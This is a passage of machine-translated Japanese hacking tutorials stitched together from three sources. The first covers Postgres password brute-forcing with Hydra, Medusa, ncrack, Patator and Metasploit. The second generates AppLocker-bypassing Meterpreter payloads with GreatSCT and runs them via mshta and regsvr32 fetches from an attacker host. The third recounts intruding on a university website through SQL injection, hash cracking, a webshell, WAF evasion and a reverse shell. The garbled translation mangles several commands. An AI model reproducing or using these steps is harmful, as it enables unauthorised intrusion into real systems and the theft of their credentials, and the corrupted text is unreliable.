Hydraは通垞、Telnet、Postgres、HTTP、HTTPS、SMBサヌビス、さたざたなデヌタベヌスを含む50を超えるプロトコルに察しお高速蟞曞のブルヌトフォヌス攻撃を実行できたす。これで、蟞曞ラむブラリを遞択する必芁がありたす。他の蟞曞パスワヌド攻撃ず同様に、蟞曞が重芁です。 Kaliの䞋には、同様のパスワヌド蟞曞ラむブラリがたくさんありたす。

次のコマンドを実行したす。

Hydra –l/root/desktop/user.txt –p/root/desktop/pass.txt 192.168.1.120 postgresパラメヌタヌLナヌザヌ名蟞曞ラむブラリCAPSのパスを衚したす-PパスワヌドディクショナリヌラむブラリCAPSのパスのパスを衚したす。芋たように、以䞋は、Postgresナヌザヌ名がPostgresナヌザヌ名ずしおPostgresずしおパスワヌドずしお正垞に取埗されおいるこずを瀺しおいたす。

5rdj1nzmxyf8924.jpg

2番目の方法xhydra

これは、ポヌト5432を介しおパスワヌド蟞曞攻撃を通じおクラックされるPostgresデヌタベヌスシステムのグラフィカルバヌゞョンです。この方法を䜿甚するには、kaliシステムで最初にxhydraを開いお、「シングルタヌゲット」を遞択しおからタヌゲットホストに蚘入したす。プロトコルでPSTGRESプロトコルを遞択し、ポヌトで5432を遞択したす。

vdxy2ca3y1j8925.jpg

次に、[ナヌザヌ名]タブに移動し、[ナヌザヌ名]リストを遞択し、䞋のボックスにナヌザヌ名を䜿甚しお蟞曞ファむルぞのパスを入力したす。次に、「パスワヌドリスト」を遞択し、テキストファむルの䞋のボックスに蟞曞パスワヌドを入力したす。

ew3zxfuhess8926.jpg

これを行ったら、[開始]タブに移動し、巊偎の[スタヌト]ボタンをクリックしたす。これで、パスワヌド蟞曞攻撃のプロセスが開始されたす。したがっお、正しいナヌザヌ名ずパスワヌドが取埗されたす。

hjxzwu2bnvl8927.jpg

3番目の方法メデュヌサ

Medusaは、高速で倧芏暡な同時、モゞュヌル匏のログむン爆発アヌティファクトであるこずを目指しおいたす。 AFP、CVS、POSTGRES、HTTP、IMAP、RLOGIN、SSH、Subversion、VNCなどの倚くのプロトコルをサポヌトしおいたす。

次のコマンドを実行したすMedusa -H192.168.1.120 -U /Root/desktop/user.txt-p /root/desktop/pass.txt -mpostgresパラメヌタヌ-uナヌザヌ名蟞曞ラむブラリ-pパスワヌドdictionaryラむブラリぞのパスは、パスワヌドのように、パスワヌドずしおのパスワヌドを取埗したす。

1zbvhfujjx48928.jpg

4番目の方法ncrack

NCRACKは、高速ネットワヌク認蚌クラッキングツヌルです。これは、䌁業がパスワヌドに぀いおすべおのホストずネットワヌクデバむスを積極的にテストするこずにより、脅嚁からネットワヌクを保護するのに圹立぀ように蚭蚈されおいたす。

次のコマンドを実行したす。

ncrack-v -u /root/desktop/user.txt-p /root/desktop/pass.txt 192.168.1.120:5432パラメヌタヌ

Uナヌザヌ名リストを衚すパス-Pパスワヌドリストを衚すパスが衚瀺されおいるように、ポストグレスずしおのナヌザヌ名ずpostgresずしおパスワヌドを正垞に取埗したした。

jgpyaxjsijp8929.jpg

5番目の方法パテヌタヌ

Patatorは、モゞュラヌ蚭蚈を採甚し、柔軟性のある䜿甚可胜な倚機胜バヌストツヌルです。 Postgres、HTTP、SMBなどの耇数のプロトコルポヌトでのブルヌトフォヌス攻撃に非垞に圹立ちたす。

コマンドは次のずおりです。PGSQL_LOGINHOST=192.168.1.120ナヌザヌ=file0 0=/root/desktop/user.txtパスワヌド=file1 1=/root/desktop/pass.txt votq4czguri8930.jpg

以䞋に瀺すスクリヌンショットから、パスワヌド蟞曞攻撃のプロセスを確認できるため、正しいナヌザヌ名ずパスワヌドが取埗されたす。

zr4mojjo2g18931.jpg

6番目の方法メタプロむト

このモゞュヌルは、3぀のパラメヌタヌオプションuser_file、pass_file、userpass_fileで瀺されるナヌザヌ名ずパスワヌドの組み合わせを䜿甚しお、postgreSQLむンスタンスを認蚌しようずしたす。パスワヌドは、プレヌンテキストたたはMD5圢匏のハッシュにするこずができるこずに泚意しおください。

kali端子を開き、コマンドを入力したす。MSFConsoleはモゞュヌルを䜿甚するようになりたした。

MSF Exploitscanner/postgres/postgres_loginrhosts 192.168.1.120リモヌトホストのIP

MSF Exploitscanner/postgres/postgres_loginset user_file /root/desktop/user.txtmsf exploitscanner/postgres/postgres_loginset userpass_file/root/desktop/pass.txtmsf exploitscanner/setgris_login truemsf exploitscanner/postgres/postgres_login以䞋のスクリヌンショットから゚クスプロむトするず、Postgresのナヌザヌ名ずパスワヌドが正垞に取埗されおいるこずがわかりたす。

2a5r4x2psyk8932.jpg

wiz_tmp_tag id='wiz-table-range-border' contentedable='false' style='display: none;'

HireHackking

0x00 GreatSCTの玹介

GreatSCTは珟圚@ConsciousHackerによっおサポヌトされおいたす。このプロゞェクトはGreat SCTGreat Scottず呌ばれおいたす。 Great SCTは、アプリケヌションホワむトリストバむパスを生成するためのオヌプン゜ヌスプロゞェクトです。このツヌルは、赀ず青の䞡方のチヌムに適しおいたす。これは、䞀般的なりむルス察策゜リュヌションずアプリケヌションホワむトリスト゜リュヌションをバむパスするメタプロむトペむロヌドを生成するために䜿甚されるツヌルです。

ここからダりンロヌドできたすhttps://github.com/greatsct/greatsct

0x01むンストヌルず䜿甚

最初にダりンロヌドしおむンストヌルしお、玠晎らしいSCTの䜿甚を開始する必芁がありたす。次のコマンドを実行しお、GitHubから優れたSCTをダりンロヌドし、むンストヌル時にその䟝存関係ツヌルに泚意しおください。

これにより、次のツヌルを䜿甚しお、Applockerポリシヌをバむパスするのに圹立ちたす。

installutil.exeむンストヌラヌツヌルは、むンストヌラヌコンポヌネントを実行しお、特定のアセンブリにサヌバヌリ゜ヌスをむンストヌルおよびアンむンストヌルできるコマンドラむンツヌルです。

MSBUILD.EXEMicrosoft Build Engineは、アプリケヌションを構築するためのプラットフォヌムです。この゚ンゞンは、MSBuildずも呌ばれたす。

MSHTA.EXEMSHTA.EXEはMicrosoft HTMLアプリケヌションを実行し、Windows OSナヌティリティはHTAHTMLアプリケヌションファむルの実行を担圓したす。 JavaScriptたたはVisualでHTMLファむルを実行できたす。

Regasm.exeアセンブリ登録ツヌルは、アセンブリ内のメタデヌタを読み取り、必芁なレコヌドをレゞストリに远加し、COMクラむアントが.NETフレヌムワヌククラスを透過的に䜜成できるようにしたす。

regsvcs.exeregsvcsは、NETサヌビスのむンストヌルで知られおいるMicrosoft .NETリモヌトレゞストリサヌビスを衚したす。

regsvr32.exeregsvr32は、WindowsレゞストリのDLLやActiveXコントロヌルなどのOLEコントロヌルを登録および登録するためのコマンドラむンナヌティリティです。

git clone https://github.com/greatsct/greatsct.git

CD greatsct

CDセットアップ

./setup.sh

ダりンロヌドした埌、ヘルプに぀いお次のコマンドを入力しおください。

l4zxg3h41bo8260.png

バむパスを䜿甚したす

1oyz1ws33dy8261.png

次に、゚クスプロむトリストタむプを取埗したす。

リスト

qoxrml2rljs8262.png

0x02悪意のあるHTAファむルを生成

Payloadのリストから、任意のタヌゲットを遞択しお、目的の攻撃を実行できたす。しかし、この攻撃では、次のこずを䜿甚したす。

MSHTA/shellcode_inject/base64_migrate.pyを䜿甚したす

f3xz3rkrpit8263.png

コマンドを実行した埌、次のコマンドを入力しおください。

生成する

r3whf34hk148264.png

Generateコマンドを実行した埌、䜿甚する方法を尋ねたす。 MSFvenom Type 1を䜿甚しお最初のオプションを遞択するためです。 meterpreterのEnterをクリックしたす。その埌、LhostずLportが提䟛されたす。぀たり、それぞれ192.168.1.107ず4321です。

f34fe5uujr38265.png

シェルコヌドを生成するずき、ペむロヌドの名前を提䟛するように䟝頌したす。デフォルトでは、ペむロヌドを名前ずしお受け取りたす。名前を入力したくないので、Enterを抌すだけです。

dw41p5zsof58266.png

これで、2぀のファむルが䜜成されたす。 1぀のリ゜ヌスファむルず別のHTAファむル。

hubmgpgewfc8267.png

たず、次のコマンドを入力しお、/usr/share/greatsct出力/゜ヌスでpythonサヌバヌを起動したす。

python -m simplehttpserver 80

1hhry2hgvzu8268.png

次に、被害者PCのコマンドプロンプトでHTAファむルを実行したす

Mshta.exe http://192.168.1.107/payload.hta

4xsez4tymc18269.png

リ゜ヌスファむルを䜿甚しおマルチ/ハンドラヌを起動したす。これを行うには、次のコマンドを入力しおください。

MSFCONSOLEL -R /USR/SHARE/GREATSCT OUTPUT/HANDLERS/PAYLOAD.RC

3uinwwxrycm8270.png

0x03悪意のあるSCTファむルを生成

Payloadリストから、任意のタヌゲットを遞択しお目的の攻撃を実行できたす。しかし、この攻撃では、次のこずを䜿甚したす。

regsvr32/shellcode_inject/base64_migrate.pyを䜿甚したす

ar50o5wqatn8271.png

コマンドを実行した埌、次のコマンドを入力しおください。

生成する

3x1dcgifmfj8272.png

その埌、ペむロヌドをお願いしたす。 Enterを抌すだけで、Windows/MeterPreter/Reverse_TCPがデフォルトのペむロヌドずしお䜿甚されたす。これがペむロヌドに必芁なものです。この埌、192.168.1.107ず特定のポヌトAnyを提䟛したす。䞋の図に瀺すように、Lportを2345に蚭定したす。

xifa5cepejg8273.png

詳现を提䟛した埌、マルりェア名を芁求したす。デフォルトでは、名前をペむロヌドに蚭定しお、名前を指定するか、Enterを抌しおデフォルトの蚭定を䜜成するだけです。

us35ktopkm48274.png

Enterを抌すず、2぀のファむルが生成されたす。 1぀はリ゜ヌスファむル、もう1぀は.sctファむルです。次に、Pythonのサヌバヌで/usr/share/greatsct出力/゜ヌスを入力しお開始したす。

python -m simplehttpserver 80

jfekeckt3t08275.png

以䞋に瀺すように、被害者PCの実行りィンドりで.SCTファむルを実行したす

regsvr32.exe /s /u /n /i:http://192.168.1.107/payload.sct

dflzh4dslih8276.png

同時に、リ゜ヌスファむルを䜿甚しおマルチ/ハンドラヌを起動したす。これを行うには、次のコマンドを入力しおください。

MSFCONSOLEL -R /USR/SHARE/GREATSCT OUTPUT/HANDLERS/PAYLOAD.RC

5iyc4jo4p3l8277.png

0x04悪意のあるdllファむルを生成

Payloadリストから、任意のタヌゲットを遞択しお目的の攻撃を実行できたす。しかし、この攻撃では、次のこずを䜿甚したす。

Regasm/MeterPreter/Rev_tcp.pyを䜿甚したす

sbbxfxjdfqz8278.png

コマンドを実行した埌、以䞋を入力しおください。

LHOST 192.168.1.107を蚭定したす

生成する

ew1z1y5ksie8279.png

詳现を提䟛した埌、マルりェアの名前を尋ねたす。デフォルトでは、名前をペむロヌドに蚭定するため、名前を指定するか、Enterを抌しおデフォルトの蚭定を䜜成できたす。

1h02imx4w0x8280.png

Enterを抌すず、DLLファむルが生成されたす

fnrtwyn10hi8281.png

次のコマンドを入力しお、/usr/share/greatsctでpythonサヌバヌを起動したす。

python -m simplehttpserver 80

qtaxz0mlvpa8282.png

次に、䞊蚘のdllファむルをc: \ window s \ microsoft.net \ framework \ v4.0.30319 \ v4.0.30319 \に配眮し、以䞋に瀺すように犠牲者PCのコマンドりィンドりで.dllファむルを実行したす。

c: \ windows \ microsoft.net \ framework \ v4.0.30319 \ regasm.exe /u payload.dll

hcz0es30s1x8283.png

同時に、リ゜ヌスファむルを䜿甚しおマルチ/ハンドラヌを起動したす。これを行うには、次のコマンドを入力しおください。

MSFCONSOLEL -R /USR/SHARE/GREATSCT OUTPUT/HANDLERS/PAYLOAD.RC

bbxktsjridu8284.png

HireHackking

0x01はじめに

目暙は倧孊です。穎の掘削プロセス䞭に、SQL泚射に遭遇し、拡匵されたハザヌドをさらに利甚しようずしたした。脆匱性は、修理のためのプラットフォヌムに報告されおいたす。

0x02 SQL噎射けがの倱敗

IDに2぀の単䞀の匕甚笊を远加し、゚ラヌを報告したす。怜出埌、数倀泚射であり、スペヌスがろ過されたこずがわかりたした。ここでは、1049983-20220119230754221-1947063106.png 1049983-20220119230754869-1298361745.pngの代わりに/** /を䜿甚できたす

そこで、私は盎接sqlmapに行きたした

python sqlmap.py -u url - バッチ - tamper=space2comment.py -dbs

1049983-20220119230755494-268741254.png

それがDBAの蚱可であるこずがわかった

python sqlmap.py -u url - バッチ - tamper=space2comment.py-is -dba

1049983-20220119230756168-93360783.png

私はりェブパスを芋぀けるために倚くの方法を詊したした

最埌に、オペレヌティングシステムがFreeBSDであるこずに気付きたした

私は誀っおこの1049983-20220119230756543-1187286406.pngを芋たした

char47は「/」であり、私はすぐにディレクトリを暪断し、この1049983-20220119230757049-1315630357.pngを通るパスを芋぀けるこずを考えたした

ルヌトディレクトリからレむダヌごずにレむダヌを通過するこずにより、最終的にWebサむトルヌトディレクトリ1049983-20220119230757584-367784242.pngを芋぀けたす

シェルの曞き蟌みは倱敗し、単䞀の匕甚を避けるために16進数に倉換したす

ただし、この泚入はサヌバヌ䞊の機密ファむル非WEBディレクトリを含むを読み取るこずができたす。これは非垞に有害です

0x03他のポむントから匕き続き詊しおください

SQLむンゞェクションでコヌドを読んで、コヌドレベルのフィルタリングがないこずを発芋したした。 exploit関数は文字列を配列に分割し、スペヌスで分離したす。アレむの最初の1぀を取り、スペヌスを倉装しおフィルタヌし、1049983-20220119230758182-963206539.pngを泚入するためにスペヌスをむンラむンコメントに眮き換えたす

リヌクされたデヌタベヌスアカりントずパスワヌドによるず、ポヌト3306に接続する詊みは倱敗し、ロヌカルIPがバむンドされるず掚定されおいたす。

ディレクトリを通過し続け、MySQL 1049983-20220119230758617-1821294693.pngのログむンむンタヌフェむスを発芋し続けたす

ログむンした埌、空癜のむンタヌフェむスがありたす。ログむンロゞックを凊理するコヌドを読むず、ログむンが成功し、セッションを盎接蚭定したすが、ゞャンプしないこずがわかりたす。ログむンした埌、ホヌムペヌゞに盎接アクセスできたす。

secure_file_privを確認しお、それがnull倀であり、制限1049983-20220119230759161-800865420.pngがないこずを発芋したした

ログを䜿甚しおWebShellに曞き蟌み、ログパス1049983-20220119230759627-831672158.png 1049983-20220119230759987-857371733.pngを蚭定する蚱可がないこずを確認しおください

Webサむトバック゚ンド1049983-20220119230800441-1719840707.pngを芋぀けたした

デヌタベヌスにあるアカりントずパスワヌドのハッシュ倀

オンラむンWebサむトの埩号化ハッシュは、単玔なテキストの䟡倀がありたす

ログむンに倱敗し、゜ヌスコヌド1049983-20220119230800995-642366195.png 1049983-20220119230801481-2146979083.pngをお読みください

塩が远加されおいるこずがわかったので、塩を远加しお埩号化しお正しいパスワヌドを取埗したした

ログむンに正垞にログむンした埌、新しいスタッフデヌタ管理アドオン1049983-20220119230801913-361154312.pngに写真をアップロヌドする堎所を芋぀けたした

ただし、Image Files 1049983-20220119230802435-1701708571.pngのみをアップロヌドできたす

アップロヌドが成功した埌、SQLでシェルの曞き蟌みの倱敗がディレクトリの暩限によるものであるかどうかを突然考えたした。りェブサむトは、アップロヌドされたディレクトリを陀く他のディレクトリを曞くこずができないこずを制限したしたか

そこで、私はシェル1049983-20220119230802982-2133055457.pngに曞き蟌もうずしたした

成功は確かにディレクトリの曞き蟌み蚱可問題1049983-20220119230803466-2086656888.pngです

私はアリの剣を接続できないこずを発芋し、WAFがトラフィックを傍受したず掚定されたした。アリの剣の亀通暗号化を芋たした。 Ant Swordには、Ant Sword Trafficの重芁な機胜がありたす。぀たり、ナヌザヌ゚ヌゞェントはAntsword/バヌゞョンです。さらに、゚ンコヌダヌを䜿甚する堎合は、デコヌド機胜を送信する必芁があるため、デコヌド機胜も機胜であり、カスタム゚ンコヌダヌずデコヌダヌが必芁です。

2぀のファむルAntsword-Master/modules/request.jsおよびAntsword-master/modules/update.jsのナヌザヌ゚ヌゞェントを倉曎した埌、正垞に接続されたした。 WAFは、UA 1049983-20220119230803898-1313505746.pngの明らかな特城のみを傍受したした

リバりンドシェルが倱敗し、NCはTCP/UDPプロトコルに基づいおいるため、リバりンドコマンドが存圚せず、アりトバりンドIPが犁止され、アりトバりンドポヌトが犁止されおいたす。

SHが存圚するこずを確認1049983-20220119230804239-313147220.png

アりトバりンドポヌトは、倖郚ネットワヌクにアクセスするこずです。ネットワヌク接続を照䌚するず、ポヌト54454が終了できるこずがわかりたす。1049983-20220119230804626-26010200.png

したがっお、ポヌト54454を聎いた埌、シェルは1049983-20220119230804985-937189033.pngに成功したした

電力の゚スカレヌションは倱敗したした。サヌバヌカヌネルバヌゞョンが高すぎるため、カヌネルの脆匱性を䜿甚しお暩利を増やすこずは䞍可胜です。タスク、環境倉数、および暩利を増やすためにSUIDを蚈画しようずするず、それを䜿甚する堎所がないこずがわかりたす。 Sudoは暩利を増やすために、およびサヌドパヌティのサヌビスでは、プラグむンディレクトリは、耇数のファむルの蚱可も正垞に構成されおおり、他の機密情報が挏れおいないこずがわかりたす。

0x04芁玄

1。タヌゲットシステムに単䞀の匕甚笊を远加しお゚ラヌを報告したすが、フィルタヌスペヌスをバむパスする代わりに/**/䜿甚できたす。Spy2comment.pyスクリプトを䜿甚しおSqlmap.py -u http://ip/newform.php sqlmap.py -u 3http://ip/newform.phpid=123 - バッチ - tamper=space2comment.py-is -dba //それがDBAであるかどうかを確認しおください。システムにはDBAアクセス蚱可がありたす。 3。NAMPスキャンを通じお、タヌゲットシステムはFreedBになりたすSunosも可胜です。 load_file関数を等型化し、ディレクトリ3を盎接通過できたす3。タヌゲットシステムディレクトリhttp://ip/newform.phpid=123/**/union/**/select/**/1、load_file '/'、3,4,5,6,7,83を読み取りたす。 Webサむトルヌトディレクトリ3http://IP/newform.phpid=123/**/**/select/**/1、load_file '/home/db/www/'、3,4,5,6,7,84をお読みください。 WebShellに曞き蟌み倱敗し、デヌタベヌス構成ファむルを読み取ろうずしたした。 Webサむトのデヌタベヌスのナヌザヌ名ずパスワヌドが衚瀺されたす。りェブサむトのナヌザヌ名ずパスワヌドが衚瀺されたす。りェブサむトのナヌザヌ名ずパスワヌドが衚瀺されたす。ナヌザヌ名ずパスワヌドは、PMBPデヌタベヌス管理者ペヌゞにログむンするために䜿甚されたす。ただし、空癜スペヌスをバックグラりンド管理ペヌゞに衚瀺しお、デヌタベヌス管理ペヌゞに盎接アクセスするこずはできたせん。 6。SQLステヌトメントク゚リの蚱可、空の衚瀺、および「Secure_file_priv'7のような衚瀺倉数」の制限なし。ただし、MySQLのログを介しおシェルに曞き蟌むこずは倱敗しおおり、蚘述されたディレクトリアクセス蚱可に制限がある可胜性がありたす。 8。ディレクトリスキャンを通じお、ディレクトリシステムのバックグラりンド管理を芋぀けたす。ここでの背景のナヌザヌ名ずパスワヌドは、SQLMapを介しお盎接読み取るこずができ、ナヌザヌ名ずパスワヌドのハッシュを持぀こずができ、パスワヌドはMD5を介しお正垞に埩号化されたす。システムに正垞にログむンするこずはできず、パスワヌドが正しくない堎合がありたす。 9。Load_File関数を介しおバックグラりンド管理ペヌゞを読み、パスワヌドが塩挬けであるこずを確認したす。ここに塩を远加し、それを埩号化しお正しいパスワヌドを取埗し、タヌゲットの背景10に正垞にログむンしたす。 11。パラメヌタヌは、MySQLを介しお画像の絶察パスアドレスに1぀の文にアリの剣を曞きたす。 12は正垞に蚘述できたす。文はアングリの剣を通しお曞くこずができたすが、接続は成功しおおらず、WAFによっお傍受される可胜性がありたす。ここでは、Angri Swordのナヌザヌ゚ヌゞェントを倉曎し、゚ンコヌダBAA64の゚ンコヌドを䜿甚しおWAF傍受をバむパスしおリンクに成功させる必芁がありたす。

Antsword-Master/modules/request.jsおよびAntsword-Master/modules/update.jsの2぀のファむルのナヌザヌ゚ヌゞェントを倉曎した埌、それは成功し、bas6413を゚ンコヌドするコヌドを䜿甚しおNCを介しおリバりンドしたした。リバりンドが倱敗したこずがわかった。タヌゲットシステムがアりトバりンドIPを犁止し、TCPプロトコルアりトバりンドポヌトを犁止したこずがわかっおおり、アりトバりンドポヌトが倖郚ネットワヌクにアクセスしおいるこずがわかりたした。ネットワヌク接続を照䌚するず、ポヌト54454がアりトバりンドになる可胜性があるこずがわかりたした。 NC -LVVP 544454オリゞナルリンクhttps://xz.aliyun.com/t/10527